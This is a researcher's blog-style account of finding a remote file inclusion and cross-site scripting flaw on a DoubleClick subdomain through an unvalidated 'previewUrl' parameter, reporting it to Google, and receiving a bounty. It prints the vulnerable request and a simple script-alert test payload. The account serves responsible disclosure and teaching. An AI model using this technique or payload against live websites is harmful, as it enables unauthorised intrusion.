Reporting vulnerability to Google in one of their web applications
It’s very interesting to discover vulnerability in famous and high profile website that is used by millions of users every day. And it’s even more interesting to be rewarded for that and get your name listed on the hall of fame for security researchers. That is exactly what happened to me after reporting vulnerability to Google in one of their web applications. Allow me to share the full story with you.
The story started when I was doing some research for Google Web Services and its Products. I noticed a service called “Doubleclick” which is the subsidiary of Google that develops and provides Internet ad services for marketers and agencies. I followed the link of the service on www.google.com/doubleclick and I started reading more about it , then I used Google search to look for it in depth , from the search results I was able to identify a domain called doubleclick.com and some other sub domains related to it; like “advertisers.
doubleclick.net” and “studio.doubleclick.com” then i started running my favorite web penetration testing tool the “Burp Suite”, which helps me to capture all the requests made by the browser. I visited these domains and started to browse the pages of the website while the burp suite is capturing all the requests, and suddenly, in one of the pages I was able to capture an Ajax request made to the link:
http://studio.doubleclick.com/ajax/externalpreviewiframe?h=DGFNAqXtFFxz4P4XUfRQpQ%3D%3D%0D%0A&height=0&&id=348635&isHTML5Preview=true&prev iewUrl=&studioDomain=.net&view=1ajax/externalpreviewiframe?view=1&width=0
I opened the link in the browser but wasn’t able to see anything interesting in it, but when I focused on the link parameters I noticed a query string parameter called “previewUrl” which has no value, from the name of the query I was able to identify that it might be used for a URL of some page, then I started thinking why not to try playing with it?
I gave it a value for link like http://twitter.com/robots. txt and guess what ? Woow It fetched the robots. txt link and showed it in the page source , so it can include any remote file from any URL ,and print the code in the same page with the same context of the double click domain .
so i tried to include a URL for a file which have a javascript code like: <script>alert(‘Hello’)</script>, and yes it worked smoothly and I can see the alert
from the page saying HELLO !
So now I have a remote file inclusion + cross site scripting (XSS), why should I wait? I started directly reporting the vulnerability to Google. And I sent them the proof of concept and demonstration for the vulnerability. After 2 days I got an email from Google security saying “Nice Catch!” and notifying me that they have confirmed the presence of the deficiency,
and they are working to fix it.
After 5 days I received another mail saying that the vulnerability was eligible for a reward and they would like to list my name on the Google hall of fame. No need to mention that I felt really happy and proud to be able to contribute and help Google security team.
My recommendations:
1) Never ignore any web page; have inputs or parameters while you are doing a web penetration testing .because even if the page doesn’t show anything interesting, it still maybe vulnerable.
2) Google Security Team is really fast for responding to the security issues compared to other companies which may reply to your initial report after 2 months.
3) If you discover a bug in a website like Google, never share it with someone else and don’t disclose it before it gets fully patched. Otherwise you will be accused and won’t take a reward from the vendor.
About The Author
Ahmed Aboul Ela, Cyber Security Analyst at EG-CERT